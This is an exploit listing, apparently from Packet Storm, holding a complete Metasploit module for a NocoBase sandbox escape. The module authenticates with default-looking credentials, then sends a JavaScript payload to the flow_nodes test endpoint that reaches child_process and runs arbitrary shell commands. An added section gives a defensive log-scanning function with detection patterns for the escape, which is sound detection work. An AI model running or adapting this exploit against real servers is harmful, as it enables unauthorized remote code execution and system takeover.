📄 NocoBase 2.0.27 Sandbox Escape / Remote Code Execution

🗓️ 24 Apr 2026 00:00:00 · Reported by indoushka · Type: packetstorm · 🔗 packetstorm.news

Metasploit module exploiting NocoBase sandbox escape causing remote code execution in versions 2.0.27 and earlier.

    ==================================================================================================================================
    | # Title     : NocoBase 2.0.27 Sandbox Escape RCE Metasploit Module                                                             |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.nocobase.com                                                                                         |
    ==================================================================================================================================
    
    [+] Summary    : This code is a Metasploit Auxiliary module designed to exploit a Remote Code Execution (RCE) vulnerability in NocoBase (<= 2.0.27).
                     It targets a flaw in the server-side script execution engine (flow_nodes) that allows breaking out of the JavaScript sandbox.
    
    [+] POC        :  
    
    ##
    # CVE-2026-34156 - NocoBase RCE
    # Sandbox escape via console._stdout prototype chain
    ##
    
    require 'msf/core'
    require 'json'
    require 'uri'
    require 'net/http'
    
    class MetasploitModule < Msf::Auxiliary
      include Msf::Exploit::Remote::HttpClient
    
      def initialize(info = {})
        super(update_info(info,
          'Name'        => 'NocoBase RCE via Sandbox Escape',
          'Description' => %q{
            This module exploits a sandbox escape in NocoBase (<= 2.0.27)
            via prototype chain manipulation leading to RCE.
          },
          'Author'      => ['Indoushka'],
          'License'     => MSF_LICENSE,
          'References'  => [
            ['CVE', '2026-34156']
          ]
        ))
    
        register_options([
          Opt::RHOST(),
          Opt::RPORT(80),
          OptString.new('TARGETURI', [true, 'Base path', '/']),
          OptString.new('USERNAME', [true, 'Username', '[email protected]']),
          OptString.new('PASSWORD', [true, 'Password', 'admin123']),
          OptString.new('CMD', [false, 'Command to execute', 'id'])
        ])
      end
    
      def build_payload(cmd)
        safe_cmd = cmd.gsub("'", "\\\\'")
    
        <<~JS.strip
          const Fn=console._stdout.constructor.constructor;
          const proc=Fn('return process')();
          const cp=proc.mainModule.require('child_process');
          return cp.execSync('#{safe_cmd}',{shell:'/bin/sh'}).toString().trim();
        JS
      end
    
      def login
        res = send_request_cgi({
          'method' => 'POST',
          'uri'    => normalize_uri(target_uri.path, '/api/auth:signIn'),
          'ctype'  => 'application/json',
          'data'   => {
            'account'  => datastore['USERNAME'],
            'password' => datastore['PASSWORD']
          }.to_json
        })
    
        if res && res.code == 200
          json = res.get_json_document
          if json && json['data'] && json['data']['token']
            return json['data']['token']
          end
        end
    
        nil
      end
    
      def exec_cmd(token, cmd)
        res = send_request_cgi({
          'method' => 'POST',
          'uri'    => normalize_uri(target_uri.path, '/api/flow_nodes:test'),
          'ctype'  => 'application/json',
          'headers' => {
            'Authorization' => "Bearer #{token}"
          },
          'data' => {
            'type' => 'script',
            'config' => {
              'content' => build_payload(cmd),
              'timeout' => 5000,
              'arguments' => []
            }
          }.to_json
        })
    
        return nil unless res
    
        begin
          json = res.get_json_document
          return json['data']['result'] if json && json['data']
        rescue
          return res.body
        end
    
        nil
      end
    
      def run
        print_status("Starting NocoBase RCE exploit...")
    
        token = login
    
        if token.nil?
          print_error("Login failed")
          return
        end
    
        print_good("Authenticated successfully")
    
        cmd = datastore['CMD']
    
        print_status("Executing: #{cmd}")
    
        result = exec_cmd(token, cmd)
    
        if result
          print_good("Output:\n#{result}")
        else
          print_error("No output received")
        end
      end
    end
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
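
For defenders, the request this module sends (an authenticated POST to `/api/flow_nodes:test` with `type` set to `script`) can be matched in HTTP request logs. The following is an added example, not part of the original advisory or of NocoBase's code; the log entry shape `{ method, path, body }`, the function names and the sample entries are assumptions constructed for illustration, and paths are assumed to be logged URL-decoded.

```javascript
// Markers taken from the payload published above. A hit is a triage signal;
// the absence of a hit does not clear the request.
const ESCAPE_MARKERS = [
  /console\s*\.\s*_stdout/,         // host stream object reachable in the sandbox
  /constructor\s*\.\s*constructor/, // climb to the host Function constructor
  /\bmainModule\b/,                 // process.mainModule.require
  /\bchild_process\b/,              // command execution module
];

// entry: { method, path, body } with body as the raw JSON text (assumed log shape).
function inspectFlowNodeTest(entry) {
  if (entry.method !== 'POST') return null;
  const path = entry.path.split('?')[0]; // drop query string; base path may vary
  if (!path.endsWith('/api/flow_nodes:test')) return null;

  let doc;
  try {
    doc = JSON.parse(entry.body);
  } catch (err) {
    return { path, severity: 'review', markers: [], reason: 'unparseable body' };
  }
  if (!doc || doc.type !== 'script') return null;

  const content = String((doc.config && doc.config.content) || '');
  const markers = ESCAPE_MARKERS.filter((re) => re.test(content)).map((re) => re.source);
  const hit = markers.length > 0;
  return {
    path,
    severity: hit ? 'alert' : 'review', // every script test call is worth a look
    markers,
    reason: hit ? 'sandbox escape markers in script content' : 'script node test call',
  };
}

// Constructed sample entries (not captured traffic).
const SAMPLE_LOG = [
  { method: 'POST', path: '/api/auth:signIn', body: '{"account":"user","password":"x"}' },
  { method: 'POST', path: '/api/flow_nodes:test',
    body: JSON.stringify({ type: 'script', config: { content: 'return 1 + 1;' } }) },
  { method: 'POST', path: '/api/flow_nodes:test',
    body: JSON.stringify({ type: 'script',
      config: { content: 'const Fn=console._stdout.constructor.constructor;' } }) },
];

const scan = (log) => log.map(inspectFlowNodeTest).filter(Boolean);

console.log(JSON.stringify(scan(SAMPLE_LOG), null, 2));
```

Because the module logs in through `/api/auth:signIn` before calling the script endpoint, correlating an `alert` finding with the preceding sign-in for the same account or source narrows down which credentials were used.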

Vulners AI Score: 6.7 (Medium risk)
CVSS 3.1: 9.9
EPSS: 0.07593